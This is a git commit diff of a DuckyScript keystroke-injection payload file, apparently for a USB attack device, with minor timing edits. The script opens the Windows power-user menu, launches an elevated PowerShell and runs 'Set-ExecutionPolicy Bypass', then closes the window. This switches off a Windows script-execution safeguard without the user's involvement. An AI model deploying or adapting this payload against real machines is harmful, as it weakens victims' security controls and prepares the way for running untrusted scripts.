Update payload.txt

pull/167/head
Kalani Helekunihi 2023-06-12 14:10:18 -04:00 committed by GitHub
parent 0eed700674
commit 8b9af00035
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 8 deletions

View File

@ -11,21 +11,15 @@ REM ############################################################################
REM Requirements: REM Requirements:
REM - Nothing REM - Nothing
DELAY 1000 DEFAULT_DELAY 500
GUI x GUI x
DELAY 500
STRING a STRING a
DELAY 500 LEFTARROW
LEFT_ARROW
DELAY 500
ENTER ENTER
DELAY 2000 DELAY 2000
STRINGLN Get-ExecutionPolicy -List STRINGLN Get-ExecutionPolicy -List
DELAY 500
STRINGLN Set-ExecutionPolicy Bypass STRINGLN Set-ExecutionPolicy Bypass
DELAY 500
STRINGLN Get-ExecutionPolicy -List STRINGLN Get-ExecutionPolicy -List
DELAY 500
ALT F4 ALT F4